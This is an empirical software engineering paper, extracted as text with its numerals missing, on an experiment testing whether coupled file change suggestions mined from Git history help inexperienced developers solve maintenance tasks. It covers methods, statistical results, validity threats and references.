/peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. • other: these include changes that are not functionally related to the system like copyright or control version system related issues. we go further and classify the perfective changes based on the most frequently involved system functionalities. for example, we want to know how many perfective issues have been defined for the user interface of the application and what are the main parts of this interface addressed in these issues. this way we expose the representativeness of the selected coupled file changes and the defined tasks for the software system we examine. definition of tasks after we determined the sets of coupled file changes which fulfill the requirements of the experiment, we continue with the definition of the tasks the participants need to solve. firstly, we determine the change context of the selected coupled file sets more precisely by looking up repeatedly in the related commit messages and the issue description. this identifies the functionality the file changes are related to. we use the mapping of the issue ids and the commit messages to follow up this information. after we identified the issues related to sets of relevant coupled file changes, we define perfective maintenance tasks related to similar functionalities covered in these issues. for example, in table we have an issue extracted from the issue tracking system of the a-stpa product which defines that a new item in the application view should be created using a keyboard shortcut. the commit message for the changes solving this task represents the comment of the developer who placed the shortcut. considering the described functionality, we create a task where the developer needs to create a new shortcut combination for that purpose. in the same manner, we repeat the procedure for each of the relevant coupled files that we have selected and define four tasks. the content of the text description of the tasks is related to the content of the issues we extracted from the issue tracking system. we keep the content of the task definitions very simple. they contain the functionality or the part of the system which has to be changed and the action to be performed. this makes it easier to replicate the process using other software products and their repositories. tasks and coupled file changes our goal is for each of the tasks to provide coupled file changes related to their context. this feature is of great importance for the study. offering unrelated coupled file can be misleading and confusing for the developers. we can extend the examination of the commit messages content and the issue descriptions to determine the change context as a part of a tool using natural-language processing techniques. we can compare the content of the user input or the issue content with the comments in the commit messages or issue description we mapped to the coupled file change sets. however, this exceeds the scope of this study and can be considered as future work. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table task information and coupled file changes. . user task task solution file set change the shortcut for adding new items in all the user interface views from ‘‘swt.keydown and ‘n’’’ into ‘‘swt.keyup and ‘y’’’ controlactionview.java systemgoalview.java designrequirementview.java safetyconstraintview.java hazardsview.java accidentsview.java related commit suggested coupled changes i have set a simple shortcut for new items to be ‘‘n’’, which can be quickly changed if needed. controlactionview.java designrequirementview.java safetyconstraintview.java accidentsview.java related issue using a keyboard shortcut, a new item should be created in the application views. solution of tasks the complete list of files included in the task solutions are defined manually by analyzing the solutions of the related issues and evaluated by an independent party. an example of the relation between the files included in the solution for a particular maintenance task and the set of coupled file changes is presented in table . here, we can see that to be able to solve the mentioned task, the developer needs to change six files which are related to the views of the application. the coupled change suggestion based on an issue related to the defined task recommends four files to be changed. these files were extracted from the version history have been changed frequently together in the past. we would like to point out that the file change suggestions do not represent the solutions for a particular task in the experiment. the solution usually contains more files than the provided suggestions. although the provided suggestions contain a subset of the solution set, the developers still need to find the location in the source code meaning the method or the class that they need to modify in order to solve the tasks. this is finer grain information that we do not provide in our coupled files. the developers still have to read the repository attributes and decide if they want to follow the coupled file change suggestions. maintenance activities after receiving the task description, the participants investigate the source code of the application, identify the files where the changes are needed and perform the changes according to the requirement. the scenario for solving the provided maintenance tasks includes the following activities (nguyen, boehm & danphitsanuphan, ): • task understanding: first of all, the participants need to read the task description and the instructions and prepare for the changes. they can ask if they need some clarification about the settings and the instructions. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the questionnaires are available in the supplemental material of this paper. • change specification: during this step, the participants locate the source code they need to change, try to understand and specify the code change. • change design: this step includes the execution of the already specified source code changes and debugging the affected source code. • change test: to specify the successfulness of the performed code changes, a unit test needs to be performed. this step is performed by the experiment organizers after the lab sessions. data collection procedure we collect data from several sources: the software repository of the system, the questionnaires, the provided task solutions and the screen capture recordings. software repositories • version control system: the first data source that we use is the log data from the version control system. the investigated project uses git as a control management tool. it is a distributed versioning system allowing the developers to maintain their local versions of source code. this version control system preserves the possibility to group changes into a single change set or a so-called atomic commit regardless of the number of directories, files or lines of code that change. a commit snapshot represents the total set of modified files and directories (zimmermann et al., ). we organize the data in a transaction form where every transaction represents the files which changed together in a single commit. from this data source we extract the coupled file changes and the commit related attributes. • issue tracking system: it stores important information about the software changes or problems. in our case, the developers used jira as their issue tracking system. this data source is used to extract the issue-related attributes. • project documentation: the software documentation gathered during the development process represents a rich source of data. the documentation contains the data model and code descriptions. from these documents, we discover the project structure. for example, in the investigated project, the package containing the files described by the following path: astpa/controlstructure/figure/, contains the java classes responsible for the control diagram figures of this software. we use the documentation to identify the package description. the complete set of attributes we extract from the software repository is presented in table . questionnaire the developers answer a number of multiple-choice questions. using the first questionnaire, we investigate the developers’ programming background. we use a second questionnaire after the tasks are solved in order to gather the feedback on the usefulness of coupled changes and the additional attributes. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table repository attributes description. attribute name attribute description commit id unique id of git commit commit message free-text comment of the commit in git commit time time-stamp of committed change in git commit author person who executed the commit issue description free-text comment on issue to be solved issue type type of the issue: bug, feature issue author person who created the issue to be solved package description free-text description of the package: layer, feature tasks completion similar to other studies (chan, ; nguyen, boehm & danphitsanuphan, ; ricca et al., ), we define two factors which represent the completion of the maintenance tasks: • correctness of solution: we determine the correctness of the solution by examining the changed source code if the solution satisfies the change requirements. we use the scoring presented previously where we summarize the points each developer gathers for each of the four tasks. the score is added next to each of the participants for both treatments, with and without using coupled file changes. • time of task completion (ts): this represents the time measured in minutes the developers spent to solve the maintenance tasks. having a scenario where the developers only need to solve the tasks, the selection of the coupled files is not included in the total time for the tasks. it does not include the time needed to determine the relatedness of the coupled files for a specific task. the completion time could be automatically determined using a tool implementation or as part of an analysis procedure and does not represent part of the developer task solution. we use a screen capturing device to record the time that each participant spends solving each of the four tasks. we record the time needed for each task in both treatments. • time required to determine the relevance of the coupled files (tr): this represents the time needed to determine the change context of each of the coupled files related to the tasks. considering a worst-case scenario, the selection of the coupled files has to be performed by the developers and the time needs to be calculated for the group using coupled file change suggestions. in this case, the total time needed for each of the tasks is the sum (tr +ts) of the time needed to select the coupled files and the time to solve the task. given the task list, the coupled files list and the issue list, we record the time the developers need to go through the process of determining the change context of the coupled files we examine for a given task. we use three additional developers to measure the time required to determine the context of each of the coupled file changes related to the tasks. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data analysis procedure to be able to test our hypotheses, we need to analyze the usefulness of the coupled file changes and the usefulness of the attributes from the software repository. we perform the analysis using the spss statistical software. usefulness of coupled file changes the main part of the analysis is the investigation of the usefulness of the coupled changes. for this purpose we compare the scores of each task solution and the amount of time needed for solving the tasks in both groups: without using coupled file suggestions and with using of coupled file suggestions. for the time needed for the solution, we only use the values for the accomplished tasks. this way we assure that the values for the unsolved tasks do not corrupt the overall values for the time needed to successfully solve the tasks. here we have two main scenarios. the first one includes only the time the developers need to solve the tasks. the second scenario also includes the time needed to select the coupled files set related to a specific maintenance task. we calculate the mean time for a particular task. furthermore, we repeat the calculation for each participant on the task. at last, we determine the grand mean as the average of all the means of the time values for each of the tasks determined by the participants, weighted by the sample size. in our case this is the number of coupled files. having k populations or tasks, the ith observation is tri which is the j(i)th coupled files set. we write j(i) to indicate the group associated with the observation i. let i vary from to n, which is the total number of samples, in our case, these are the coupled files, j varies from to k, the total number of tasks. there are a total of n observations with nj observations in sample j: n=n +···+nk. the grand mean of all observations is calculated using the formula: tr = k∑ j= (nj n ) trj ( ) here, tr is the average of the sample means, weighted by the sample size (hanlon & larget, ). to determine the usefulness of coupled file changes, we test the overall difference in the correctness of solving the tasks using the two-tailed mann–whitney u test. it is used to test hypotheses where two samples from the same population have the same medians or that one of them has larger values, so we test the statistical significance of difference between two value sets. determining an appropriate significance threshold defines whether the null hypothesis must be rejected (nachar, ). if the p-value is small, the null hypothesis can be rejected meaning that the value sets are different. if the p-value is large, the values do not differ. usually a . -level of significance is used as threshold. the p-value is not enough to determine the strength of the relationship between variables. for that purpose we report the effect size estimate (tomczak & tomczak, ). ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we use a conservative approach where we test the difference in the correctness of our tasks. without differentiating the tasks, we compare all the solutions of the tasks using coupled file changes and the tasks performed without any suggestion. we repeat the same approach to test the overall difference between the time needed to solve the tasks using coupled change suggestions against the tasks solved without the help of coupled file changes. we use the spss statistical software and its typical output for the mann–whitney u test whereby the p-value of the statistical significance in the difference between the two groups is reported. the mean ranking determines how each group scored in the test. to support statistical difference between the samples, we calculate the r-value of the effect size proposed in (cohen, ) using the z value from the spss output (fritz, morris & richler, ). a value of . determines a large effect, . means medium effect and . identifies a small effect (coolican & taylor, ). given that we have a study which is restricted to a small number of comparisons, we do not adjust the p-value using a procedure like the bonferroni correction (armstrong, ). usefulness of attributes we analyze the feedback from the questionnaire investigating which attributes are useful. we investigate every attribute in the set extracted from the versioning system, the issue tracking system and the documentation as previously presented. for that purpose we use the kruskal–wallis h test, an extension of the mann–whitney u test. using this test, we determine if there are statistically significant differences between the medians of more than two independent groups. we test the statistical significance between more than two value sets. the significance level determines if we can reject the null hypothesis. p-values bellow . mean that there is a significant difference between the groups (pohlert, ). to determine the effect size for the kruskal-wallis h test, we calculate the effect sizes for the pairwise mann–whitney u tests for each of the attributes using the z statistic. we individually calculate the r-value for the effect size for each pair comparison. the r-value is calculated using the following formula: r = z √ n . ( ) our approach tests the differences in the feedback about the usefulness between all the attributes for all participants. this way we identify which attributes we should offer to the participants when solving their tasks together with the coupled file change suggestions. using spss, we provide the statistical significance values of the difference between all eight attributes. the ranking of the means for the feedback on the usefulness values determine the most useful attributes. execution procedure • log extraction: we extract the information from the git log containing the committed file changes and the attributes. the log data is exported as a text file and the output is managed using proper log commands. • data preprocessing: after the text files with the log data have been generated, we continue with the preparation of the data for mining. various data mining frameworks ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. use their own format, so the input for the data mining algorithm and framework needs to be adjusted. • support threshold: to begin the investigation, we need to extract coupled file changes from the software repository. we extract the coupled changes by defining the threshold value of the support for the frequent item set algorithm. we use the thresholds that give us a frequent yet still manageable number of couplings. this threshold is normally defined by the user. we use the technique presented in (fournier-viger, ) to identify the support level. these values vary from developer to developer, so we test the highest possible value that delivers frequent item sets. if the support value does not yield any useful results for a particular developer, we drop the value of the threshold. we did not consider item sets with a support rate below . , meaning the coupled changes should have been found in percent of the commits. • mining framework: there is a variety of commercial and open-source products offering data mining techniques and algorithms. for the analysis, we use an open-source framework specializing in mining frequent item sets and association rules called the spmf-framework (http://www.philippe-fournier-viger.com/spmf). it consists of a large collection of algorithms supported by appropriate documentation. • experiment preparation: we prepare the environment by setting up the source code and the eclipse where the participants will work on the tasks. we define the maintenance tasks and provide the free text description. we prepare the coupled file changes and the attributes from the software repository to be presented to the participants in the experiment. • solving tasks: the participants in both groups work for two hours in two labs and provide solutions for the maintenance tasks. the solution and the screen recording are saved for further analysis. • material gathering: we gather the questionnaires, the edited source codes and the video files of the participants screens for further analysis. • solution analysis: we analyze the scores for the correctness of the maintenance tasks, calculate the time needed for solving the tasks and determine the influence of the coupled file changes on the task solution. results and discussion the complete list of the maintenance tasks, the coupled file changes, the software repository attributes, the questionnaires and the analysis results can be found in the supplemental material of this paper. participants the participants’ feedback about their background reports that most of them have around one year of programming experience and less than one year of experience with versioning and issue tracking systems. none of them answered to be in any way involved on the a-stpa project. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.philippe-fournier-viger.com/spmf http://dx.doi.org/ . /peerj-cs. table issue classification. issue category frequency % corrective . implementation . perfective . adaptive . other . table perfective issues. change category frequency % views , control structure , menus , non functional source changes , issues classification based on the proposed classification from hindle, german & holt ( ), we classified the issues from the issue tracking system related to commits in the git version history as presented in table . here we can see that most changes of the system are corrective, implementation and perfective issues. further, we examined the perfective issues in more detail to determine to which parts of the system they are related. we have identified several classes of perfective issues related to the main functionalities of the system that we investigated in the experiment as presented in table . the most frequent perfective issues are related to changes to the view elements of the system user interface responsible for the visualization of the hazard analysis steps including their layout, tables, grids, text fields, buttons, icons and labels. these changes have been organized in the class called views. the next class called control structure is composed by the issues which handle the changes related to the control structure functionality of the user interface. it is responsible for drawing the diagrams, connects the layout components and includes changes on the diagram elements like objects, labels and connections. the following class we call menus is related to the issues associated to the user interface menus which are used to manipulate the creating and editing of project elements including changes in the wizards, the actions, labels and icons. the last class includes the issues covering non-functional changes in the source code like cleanups, refactoring or formatting. the task distribution in the experiment corresponds to this classification. we have defined two tasks for the application views, one task for the menus and one task for the control structure of the user interface. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure task correctness distribution. full-size doi: . /peerjcs. /fig- usefulness of coupled file changes as we already explained, we operationalize the usefulness of coupled file changes by their influence on the correctness of the solutions and the time needed to solve the tasks. correctness we summarize the correctness distribution as presented in fig. . on the y-axis we have the frequency of occurrence and on the x-axis the score of solving of the tasks. here, the observations are grouped based on the presence of coupled change suggestions during the maintenance task solution. from this figure we see that the participants achieved better scores using the coupled file change suggestions we provided. we investigate the correctness difference of both groups by testing the first null hypothesis of the first research question claiming that there is no significant difference in the correctness of the task solutions. applying the mann–whitney u test results in a p-value of . as presented in table . this result has to be lower than the threshold of . , so this null hypothesis can be rejected. this means that there is a statistically significant difference in the correctness of the solution for the provided tasks when using coupled file change suggestions against the correctness of the solutions only using the provided task description. the r-value of the effect size for the correctness is . which describes a strong statistical difference in the correctness of the maintenance task solutions between the groups that did or did not coupled change suggestions. in table , we represent the descriptive statistics for the correctness of the task solutions. the participants which used the suggestions solved . % of the tasks completely, whereby ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table statistical significance (coupled changes). depend. variable p-value r-value correctness . . time effort . . table descriptive statistics for the correctness of the tasks. without suggestions (−) with suggestions (+) completely solved tasks median mad completely solved tasks median mad % . % theparticipants notusing suggestionssolved only % ofthe tasks. thisshows asignificantly higher score for the group using coupled change suggestions. the median absolute deviation (mad) value for the group using coupled changes is , whereby the value for the group not using coupled changes is . these values show that the correctness score is spread very close to the median for the score of the first group. the statistical results provide evidence that the coupled file changes significantly influenced the correctness of the maintenance tasks in the experiment. inexperienced developers solved more tasks when using our suggestions which means they used the benefit of hints related to similar tasks. the coupled change suggestions allow the developer to follow a set of files and remind him/her that similar tasks include changes in various locations in the source code. the improvement in the number of solved tasks for the group using the coupled change suggestions shows that developers have used the benefits of additional help in locating the features and the files to be modified to solve their tasks successfully. the group that did not use this kind of help did not succeed in solving the same or a higher number of tasks which points to the usefulness of our approach. the use of coupled file changes has been especially noticed in cases where the developer needs to perform similar changes in several locations, like editing different views of the application gui. here, the developers not using coupled change suggestions missed implementing the change in all the files where the change should have been performed. coupled file change suggestions help the developers not to miss other source code locations they need for their task. time we analyzed the influence of using coupled file change suggestions on the time needed to successfully perform the tasks versus not using them. many participants used split-screen and kept the documentation window open so we were not able to subtract the time spent reading the documentation from the total amount needed to solve the tasks. the distribution of the values for the time needed to solve the tasks is presented in fig. . we see that the distributions are similar with a slight tendency for more time needed to solve the tasks without suggestions. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure time boxplots (ts). full-size doi: . /peerjcs. /fig- we test the second null hypothesis which claims that there is no influence of the coupled file changes on the time needed to solve the tasks. the distribution including the time to determine the relatedness of the coupled files is presented in fig. . considering only the time needed to solve the tasks (ts), the p-value for the two tailed test is . . this value is slightly below the . threshold for the significance of the difference in the time needed to solve the tasks by the group using coupled file changes versus the group that didn’t. therefore, we reject the null hypothesis. the r-value for the time needed to solve the maintenance tasks is . which shows a relatively small statistical difference between the group that used coupled change suggestions and the group that did not. considering the case where we include the time to select the coupled files to the time needed to solve the tasks (tr +ts), we can see that there is almost no difference in the time measured for the group not using the coupled files and the group using coupled files. here, the p-value for the total time is . , which means that in this case the null hypothesis cannot not be rejected. the r-value for the total time is . , which emphasizes this small difference between using and not using coupled file change suggestions. after calculating the grand mean for tr, we added three more minutes to the amount of time for the task solution and included it in the analysis of the difference between both ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure time boxplots (tr +ts). full-size doi: . /peerjcs. /fig- groups regarding the use of coupled file change suggestions. the time needed to determine the related coupled files for the additional participants is presented in table . for the total time including the time needed to select the coupled files, we add the number of considered coupled files per task and the mean time the developers needed to select the coupled files for the particular task. the descriptive statistics in table for the time needed to solve the tasks report a decrease in the means for the time needed to solve the tasks by % for the group using coupled change suggestions. the means ranking reports slightly better results for the group using coupled file changes, which means that the participants of this group solved their tasks slightly faster. the standard deviation for the group using coupled changes is twice lower than for the group not using coupled changes which shows a higher spread-out for the first group. including the time needed to select the coupled files, the values are almost the same for both groups. from the results, we can see that in this case, because of the additional time we added for each of the participants, there is almost no difference between the mean values which tells us that the group using coupled files did not manage to solve the tasks faster. the results related to the task selection time show a small improvement for the time needed to solve the tasks. the developers using coupled change suggestions needed less time to find the files to be changed. without coupled file changes, they would need to search for the features and files in the source code they need to edit. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table time to determine related coupled files. time (minutes) task task task task participant coupled files coupled files coupled files – – participant coupled files coupled files coupled files – – participant coupled files coupled files coupled files – – all participants mean (coupled files) . . . . grand mean (tasks) . table descriptive statistics for the time needed in minutes. median mean stand. dev. without suggestions . . with suggestions (ts) . . with suggestions (tr +ts) . . the improvement in the time needed to solve the tasks for the group using the coupled file changes is not as strong as the improvement in the correctness of the task solutions. it does not eliminate the time that the developers need to understand the features and the changes they need to perform in the source code. they still need time to organize this information and use it. furthermore, they need to read and understand the suggestions. coupled file change suggestions do not automatically provide a solution for solving their tasks. if we include the time needed to select the coupled files, the results show that there is no improvement for the group using the coupled file change suggestions. if the coupled files need to be determined by the developers as a part of the task solution procedure, the small advantage for the groups using the suggestions disappears. an automated extraction of coupled file change suggestions including the determination of their relatedness could therefore be beneficial. usefulness of software repository attributes the distribution of the usefulness of each repository attribute is presented in fig. . the mean values for the usefulness of each of the repository attributes have been determined using the feedback of all participants in the experiment. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure usefulness of attributes. full-size doi: . /peerjcs. /fig- we test the third null hypothesis which claims that there is no difference in the usefulness between the attributes using the p-value of the kruskal-wallis h test. in our case, the p- value for this test is . which is lower than the . threshold. this result leads us to reject the null hypothesis. this means that the alternative hypothesis claiming that there is a significant difference in the perceived usefulness among the attributes from the software repository is true. we reported a set of various software attributes from the software repository. the participants reported their feedback on their usefulness at the end of the experiment lab after the tasks had been performed. we gathered the descriptive statistics for the participants’ feedback on the usefulness of each attribute presented in table . the median values vary from for the commit id, the commit author, the commit time, the issue author and the issue time, to for the commit message and the package description. this places the cutoff between ‘‘neutral’’ and ‘‘somewhat interesting’’ for most of the attributes. the mad value for all attributes is , which shows a low spread out of the usefulness values around the median. we calculated the r-value of the size effect for the repository attributes by creating pairs of each of the attributes where we determined the z-value of the mann–whitney test for each pair as presented in table . we have pairs of attributes. the greatest difference in the usefulness is between the commit time and the issue description where the r-value is . , followed by the difference between the commit time and the package description with an r-value of . . this indicates a high statistical significance between these pairs of attributes. the lowest difference is between the commit ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table descriptive statistics (attributes usefulness). attribute median mad package description issue description commit message issue type commit id commit author issue author commit time table statistical significance (coupled changes). p-value r-value repository attribute pairs . . commit id commit message . . commit id commit author . . commit id commit time . . commit id issue description . . commit id issue type . . commit id issue author . . commit id package description . . commit message commit author . . commit message commit time . . commit message issue description . . commit message issue type . . commit message issue author . . commit message package description . . commit author commit time . . commit author issue description . . commit author issue type . . commit author issue author . . commit author package description . . commit time issue description . . commit time issue type . . commit time issue author . . commit time package description . . issue description issue type . . issue description issue author . . issue description package description . . issue type issue author . . issue type package description . . issue author package description ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. id and the commit author, here the r-value is . , followed by the difference between the commit id and the issue author with an r-value of . . this shows that there are significant differences in the usefulness between individual attributes. we determined that the attributes have different usefulness using the feedback of the participants. the median ranking defines which of the attributes are most useful. as the most useful attribute we identify the package description followed by the issue description and the commit message. this leads us to the conclusion that the inexperienced developers seek for help about the features of the source code that they need to edit and the task that they have to complete. the issue type and the commit time are in the middle of the list. the most useless attribute is the commit author followed by the issue author and the commit id. here, we suppose that the developers are not interested in the information regarding who performed the changes because they do not know this person. this could change if the developers were included in the project for a longer time. although we produced a list of typical repository attributes, the participants have identified a smaller set of attributes to be useful for them than we provided in this experiment. this means that we do not have to present all the attributes to the developers together with the coupled files for the reason that different developers can happen to find some attributes as obsolete to be included in the coupled file change suggestions. an individual choice of useful attributes can avoid confusion and increase the acceptance of the coupled file change suggestions concept. threats to validity • internal validity: potential internal validity threats can rise from the experiment design. to limit the learning effect, we use a counterbalanced design where every developer solves four different tasks where each of them solves two tasks without and two tasks using coupled change suggestions. this way the results are not directly influenced by the task supported by the coupled file suggestions. other validity threats related to the experiment design are the selection of the coupled file changes, the creation of the maintenance tasks as well as their definition and solution. we extracted coupled files using a relatively high threshold which limits the possibility to provide suggestions for coupled changes that happened by chance. we selected the most frequent coupled files for each of the developers to avoid subjective interference. we also avoided delivering unrelated changes in order not to confuse the developer by providing suggestions out of the context. the maintenance tasks were constructed manually. however, they are related to issues from the issue tracking system and fulfill the conditions set in the experiment to be perfective and related to changes of the user interface. we classified the issues on the system based on the maintenance categories to show the representativeness of our maintenance tasks. the content includes a simple description of the functionalities and the required actions in order not to overwhelm the inexperienced developers by providing unnecessary information. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the set of files included in the solution of the tasks was provided by manually analyzing related issue solutions. we validated the task solutions using a third party. the judgment of correctness of the developers’ task solutions represents another internal threat whereby we test the solutions to determine the level of correctness. the time needed to determine the relatedness of the coupled files can differ. to avoid an influence by particular tasks, we calculate the average time per coupled file set and calculate the grand mean for all tasks. we used independent student participants for the measurement of the time needed to select the related coupled files. also the metrics that we used to determine the usefulness can represent a threat. the subjective usefulness rating represents another construct validity whereby we evaluate the provided task solutions pairwise to minimize the errors in conducting the score distribution. for the time needed to solve the tasks, we play the captured screens of the participants to calculate the time the developers needed to solve the tasks. • external validity: the external validity threat concerns the generalization of the experiment. the main threats here are related to the choice of the coupled file changes, the type and description of the maintenance tasks as well as the participants and the system we investigate. we used a data mining technique that can be easily performed on other git repositories to extract coupled file changes. our approach uses mapping between the commits and the issues which excludes the projects not using them. however, this practice is used very often today. we can find many projects in various on-line software repository collections like github using this kind of mapping and providing issue and project description. we chose simple perfective tasks that can be easily replicated and do not require large changes in the source code. the description of the tasks is simple and includes the source code functionalities to be changed and the activities without any specific format or structure. this way we maintain the possibility to repeat the process for other projects and limit the possibility of creating artificial conditions specially tailored for our experiment. yet, it is not clear whether the results can be generalized for other types of maintenance tasks. the student participants in the experiment have basic programming experience which corresponds to the target group of our study to address inexperienced developers. the system we used for the experiment is an open source java project with a clear project structure and repository. it does not contain specific information that can challenge the replication of the analysis. conclusion and future work from the provided results, we summarize that the coupled file change approach was successfully tested in the performed experiment. the participants working with coupled change suggestions provided significantly more correct solutions than the participants without these suggestions. the participants using coupled file change suggestions did not manage to solve their tasks significantly faster in comparison to the participants working only with the issue descriptions. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we conclude that the coupled file change suggestions can be positively judged to be useful for inexperienced developers working on perfective maintenance tasks. the influence is particularly positive on the correctness of the solutions. the influence of the coupled change suggestions on the effort for solving the tasks is much lower than on the correctness of the solutions. considering the time needed for the selection of the coupled files as part of the task solution procedure, the use of the coupled files does not give any advantage. we extended the findings of ramadani & wagner ( ) where the participants judged the coupled file changes and the attributes as neutral to use in maintenance tasks. our experiment outcomes are more positive compared to the results in ramadani & wagner ( ). working on real maintenance tasks and a real software product increases the acceptance of coupled change suggestions by the developers. also, we rounded up the set of useful attributes based on the set of attributes presented in this study. the next steps would be to transform the results and the findings into full-fledged tool implementation to support the developers working on maintenance tasks with the visual presentation of suggestions of the files they should also change. the final set of attributes presented in the tool should be adjustable so the developers will not be overwhelmed with information which could negate the positive effect we have found in this study. acknowledgements we would like to thank dr. asim abdulkhaleq for his help in the evaluation of the coupled files, the tasks and their solutions, the process of scoring and the analysis of the questionnaires. we also thank nakharin donsupae, dominik kesim and adrian weller for their help in the process of selecting the coupled files. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • jasmin ramadani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • stefan wagner conceived and designed the experiments, performed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplementary file. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abran a, nguyenkim h. . analysis of maintenance work categories through measurement. in: proceedings of the international conference on software maintenance. washington, d.c.: ieee, – doi . /icsm. . . agrawal r, srikant r. . fast algorithms for mining association rules in large databases. in: bocca jb, jarke m, zaniolo c, eds. proceedings of the international conference on very large data bases. san francisco: morgan kaufmann publishers inc., – . armstrong ra. . when to use the bonferroni correction. ophthalmic and physiologi- cal optics ( ): – doi . /opo. . basili vr. . viewing maintenance as reuse-oriented software development. ieee software : – doi . / . . basili vr, caldiera g, rombach hd. . the goal question metric approach. in: encyclopedia of software engineering. los alamitos: john wiley and sons, inc. bavota g, dit b, oliveto r, di penta m, poshyvanyk d, de lucia a. . an empirical study on the developers perception of software coupling. in: notkin d, cheng bhc, pohl k, eds. proceedings of the international conference on software engineering. washington, d.c.: ieee, – . bieman j, andrews a, yang h. . understanding change-proneness in oo software through visualization. in: proceedings of the ieee international workshop on program comprehension. washington, d.c.: ieee, – doi . /wpc. . . bird c, rigby pc, barr et, hamilton dj, germán dm, devanbu pt. . the promises and perils of mining git. in: proceedings of the working conference on mining software repositories. washington, d.c.: ieee, – doi . /msr. . . briand l, morasca s, basili v. . an operational process for goal-driven defi- nition of measures. ieee transactions on software engineering : – doi . /tse. . . canfora g, cerulo l. . impact analysis by mining software and change request repositories. in: proceedings of the ieee international software metrics symposium (metrics’ ). washington, d.c.: ieee, – doi . /metrics. . . carlsson e. . mining git repositories: an introduction to repository mining. available at https://www.diva-portal.org/smash/get/diva : /fulltext .pdf (accessed on march ). chan t. . impact of programming and application-specific knowledge on mainte- nance effort: a hazard rate model. in: proceedings of the ieee international conference on software maintenance. beijing: ieee, – doi . /icsm. . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /opo. http://dx.doi.org/ . / . http://dx.doi.org/ . /wpc. . http://dx.doi.org/ . /msr. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /metrics. . https://www.diva-portal.org/smash/get/diva : /fulltext .pdf http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /peerj-cs. cohen j. . statistical power analysis for the behavioral sciences. l hillsdale: lawrence erlbaum associates. coolican h, taylor f. . research methods and statistics in psychology. london: hodder education. d’ambros m, lanza m, robbes r. . on the relationship between change coupling and software defects. in: proceedings of the working conference on reverse engineering. washington, d.c.: ieee, – doi . /wcre. . . de lucia a, pompella e, stefanucci s. . effort estimation for corrective software maintenance. in: proceedings of the international conference on software engineering and knowledge engineering. new york: association for computing machinery, – doi . / . . fischer m, pinzger m, gall h. . populating a release history database from version control and bug tracking systems. in: proceedings of the international conference on software maintenance. washington, d.c.: ieee, doi . /icsm. . . fluri b, gall h, pinzger m. . fine-grained analysis of change couplings. in: pro- ceedings of the ieee international workshop on source code analysis and manipulation. washington, d.c.: ieee, – doi . /scam. . . fournier-viger p. . how to auto-adjust the minimum support threshold according to the data size. available at http://data-mining.philippe-fournier-viger.com/ (accessed on march ). fritz co, morris pe, richler jj. . effect size estimates: current use, calcula- tions, and interpretation. journal of experimental psychology: general : – doi . /a . gall h, hajek k, jazayeri m. . detection of logical coupling based on product release history. in: proceedings of the international conference on software maintenance. washington, d.c.: ieee, doi . /icsm. . . gall h, jazayeri m, krajewski j. . cvs release history data for detecting logical couplings. in: proceedings of the international workshop on principles of software evolution. washington, d.c.: ieee, – doi . /iwpse. . . german dm. . mining cvs repositories, the softchange experience. in: pro- ceedings of the international workshop on mining software repositories. – doi . /ic: . györödi c, györödi r. . a comparative study of association rules mining algo- rithms. available at http://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . rep=rep type=pdf (accessed on march ). han j. . data mining: concepts and techniques. burlington: morgan kaufmann publishers inc. han j, pei j, yin y. . mining frequent patterns without candidate genera- tion. in: proceedings of the acm sigmod international conference on man- agement of data. new york: association for computing machinery, – doi . / . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /wcre. . http://dx.doi.org/ . / . 